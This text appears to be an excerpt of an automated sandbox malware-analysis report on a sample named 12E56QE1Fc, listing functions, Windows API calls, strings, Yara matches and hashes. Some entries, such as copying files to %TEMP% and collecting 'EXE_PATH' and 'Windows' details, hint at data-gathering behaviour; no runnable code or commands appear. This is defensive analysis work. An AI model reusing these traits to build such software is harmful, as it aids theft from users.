InterlockedDecrement.KERNEL32(?), ref: 0042AB9A
_free.LIBCMT ref: 0042ABAD
InterlockedIncrement.KERNEL32(00442690), ref: 0042ABC5

Strings

h"D, xrefs: 0042ABA4

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: h"D
API String ID: 3470314060-1871085603
Opcode ID: c78cffae1ce7fb4b31c6c523806551106b4e0418e83a8d34b454a12d7a5f08c9
Instruction ID: daae66e29feea988ff867385fbaf3e1678727e6f048656515397907ada06cf88
Opcode Fuzzy Hash: c78cffae1ce7fb4b31c6c523806551106b4e0418e83a8d34b454a12d7a5f08c9
Instruction Fuzzy Hash: 6701A132B01631ABD710AF25B94575E7B61BB00714F85019BFE10A7691CB7C7A91CBCE

Function 00428570 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(0043DBD4,00440230,00000008,00428678,00000000,00000000,?,?,00425F6E,00425B73,?,?,00423971,00000000), ref: 00428581
__lock.LIBCMT ref: 004285B5

Part of subcall function 00428E2C: __mtinitlocknum.LIBCMT ref: 00428E42
Part of subcall function 00428E2C: __amsg_exit.LIBCMT ref: 00428E4E
Part of subcall function 00428E2C: RtlEnterCriticalSection.NTDLL(00000000), ref: 00428E56

InterlockedIncrement.KERNEL32(?), ref: 004285C2
__lock.LIBCMT ref: 004285D6
___addlocaleref.LIBCMT ref: 004285F4

Strings

h"D, xrefs: 004285AC
q9B, xrefs: 004285DF

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: h"D$q9B
API String ID: 637971194-773263424
Opcode ID: cb034427e11c4b89fc2f08806244b4fc54a6fcd13b86a61d5afa892cfb624b7e
Instruction ID: 3a8f04d1f40cfa8200e3906c038708a6bd9f88cc540cc5f9db8b441ba29455b9
Opcode Fuzzy Hash: cb034427e11c4b89fc2f08806244b4fc54a6fcd13b86a61d5afa892cfb624b7e
Instruction Fuzzy Hash: 89015E71A417009BE7209F76E90670EFBE0AF10324F50854FE495963A1CFB8A944CB19

Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0

Strings

Error, xrefs: 004033D4
Runtime error at 00000000, xrefs: 0040339A, 004033D9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
DeleteFileW.KERNEL32(00000000), ref: 004110EC

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF
, xrefs: 00411078

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58

Function 00428860 Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(0043DBD4,?,00425E3A), ref: 00428868
__mtterm.LIBCMT ref: 00428874

Part of subcall function 00428533: RtlDecodePointer.NTDLL(00441E80), ref: 00428544
Part of subcall function 00428533: TlsFree.KERNEL32(00441E84,004289D6,?,00425E3A), ref: 0042855E
Part of subcall function 00428533: _free.LIBCMT ref: 00428D04

TlsAlloc.KERNEL32(?,00425E3A), ref: 00428901
__init_pointers.LIBCMT ref: 00428926
__calloc_crt.LIBCMT ref: 00428994
GetCurrentThreadId.KERNEL32 ref: 004289C0

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 347030822-0
Opcode ID: ad6de0f5bdc587c8bb08565aa090d42b12e8146025ae027129b3057423f6f460
Instruction ID: 8383bb41cacc3f466536d41129240b0fe1aec606d7baca788f231752a80ed095
Opcode Fuzzy Hash: ad6de0f5bdc587c8bb08565aa090d42b12e8146025ae027129b3057423f6f460
Instruction Fuzzy Hash: 28316671E01361AAC711AF75BC8461B7AA4EB44798B54093FE800DB2B6EF789442CFDD

Function 00431861 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004317B8

Part of subcall function 00428E2C: __mtinitlocknum.LIBCMT ref: 00428E42
Part of subcall function 00428E2C: __amsg_exit.LIBCMT ref: 00428E4E
Part of subcall function 00428E2C: RtlEnterCriticalSection.NTDLL(00000000), ref: 00428E56

InterlockedDecrement.KERNEL32(00000000), ref: 004317CA
_free.LIBCMT ref: 004317DF

Part of subcall function 0042B379: HeapFree.KERNEL32(00000000,00000000,?,0042868E,00000000,?,?,00425F6E,00425B73,?,?,00423971), ref: 0042B38F
Part of subcall function 0042B379: GetLastError.KERNEL32(00000000,?,0042868E,00000000,?,?,00425F6E,00425B73,?,?,00423971), ref: 0042B3A1

__lock.LIBCMT ref: 004317F8
___removelocaleref.LIBCMT ref: 00431807
___freetlocinfo.LIBCMT ref: 00431820
_free.LIBCMT ref: 0043183D

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 556454624-0
Opcode ID: 5c5f0fca78b213f1fe9775b2eb13d4225c097266beb984ad550eb2432f9b29d8
Instruction ID: b2e398cb16d27c65bb4104a513259ea536f59f8bf22d6f583ce5cb3e230796cc
Opcode Fuzzy Hash: 5c5f0fca78b213f1fe9775b2eb13d4225c097266beb984ad550eb2432f9b29d8
Instruction Fuzzy Hash: 9D119A21602204AAEB24AFA5A84572E73D4AF08764FA4551FF894DB2A1DF7C8C80C66D

Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8

Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Function 0043186C Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00431878

Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD

__calloc_crt.LIBCMT ref: 00431883

Part of subcall function 0042B433: Sleep.KERNEL32(00000000,00423971,00000000), ref: 0042B45B

__lock.LIBCMT ref: 004318B9
___addlocaleref.LIBCMT ref: 004318C5
__lock.LIBCMT ref: 004318D9
InterlockedIncrement.KERNEL32(?), ref: 004318E9

Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 3803058747-0
Opcode ID: 70867ea875173e1f7dd9969e88531944267e4a1a24b45398618f5ded469c5ce0
Instruction ID: d223db73b8d1a923083aa51fa87a399d57b8196510375e44380c67d35a6f758e
Opcode Fuzzy Hash: 70867ea875173e1f7dd9969e88531944267e4a1a24b45398618f5ded469c5ce0
Instruction Fuzzy Hash: AC015E71A01724EAE720BFB6A80275D77A0EF08728FA0411FF9649A2D2CF7C59408A5D

Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
DeleteFileW.KERNEL32(00000000), ref: 00410DBE

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58

Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410945
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
DeleteFileW.KERNEL32(00000000), ref: 00410B06

Strings

.tmp, xrefs: 00410960
%TEMP%, xrefs: 00410980

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58

Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC
FPUMaskValue, xrefs: 00402B10

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Function 00416584 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

@, xrefs: 004165C7
kernel32.dll, xrefs: 004165A6
GlobalMemoryStatusEx, xrefs: 004165A1

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryLoadProcString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 923276998-3878206809
Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C

Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677

Strings

kernel32.dll, xrefs: 0040665B
IsWow64Process, xrefs: 00406656

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D

Function 0042EA06 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,?,00440488,0000000C), ref: 0042EA3A
GetLastError.KERNEL32(?,?,00440488,0000000C), ref: 0042EA44
__dosmaperr.LIBCMT ref: 0042EA4B
__alloc_osfhnd.LIBCMT ref: 0042EA6C
__set_osfhnd.LIBCMT ref: 0042EA96

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
String ID:
API String ID: 43408053-0
Opcode ID: b5d169558445881238b3d156c4f27ab8e0aa30e32d4c1c84ee3f67fb1fef7cf2
Instruction ID: a5aaf9b701305fbf469fad5f25b8e8034a3286bd8ef1cfd879e4e61f2fcf1838
Opcode Fuzzy Hash: b5d169558445881238b3d156c4f27ab8e0aa30e32d4c1c84ee3f67fb1fef7cf2
Instruction Fuzzy Hash: C0210631B016259ACF119B6BE8053AA7B50BF46324F98824BE8748F2D3CB7C8941DF49

Function 00430627 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00430635

Part of subcall function 00425AEA: __FF_MSGBANNER.LIBCMT ref: 00425B03
Part of subcall function 00425AEA: __NMSG_WRITE.LIBCMT ref: 00425B0A
Part of subcall function 00425AEA: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00425B2F

_free.LIBCMT ref: 00430648

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: e0bf7721241db337047a49e63f1d7736ca543470368040e1374fc4efe5aab102
Instruction ID: c3c700d70fdca2b708fba14eade6fb698b57cddcabcd3cbcdbac414ffce71832
Opcode Fuzzy Hash: e0bf7721241db337047a49e63f1d7736ca543470368040e1374fc4efe5aab102
Instruction Fuzzy Hash: 63112B32600621ABCB213B76BD16A1F3794DF88370F15122BFC55CA251DF3CC851869C

Function 0042B300 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042B30C

Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD

__getptd.LIBCMT ref: 0042B323
__amsg_exit.LIBCMT ref: 0042B331
__lock.LIBCMT ref: 0042B341
__updatetlocinfoEx_nolock.LIBCMT ref: 0042B355

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5e7c07f3ba6bce783e15daa034832957f209102ffa1da8a0b74f6172f75b8300
Instruction ID: 6ae8c60cd211180a8c43ced92eb17e901d77e809150f2ba35d6ecccb95a68be4
Opcode Fuzzy Hash: 5e7c07f3ba6bce783e15daa034832957f209102ffa1da8a0b74f6172f75b8300
Instruction Fuzzy Hash: ABF06231B05730DAD620BB66780675E6390AB00718FD1411FF954A62D2CF6C59419A9E

Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58

Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58

Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58

Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON

Download Yara Rule

APIs

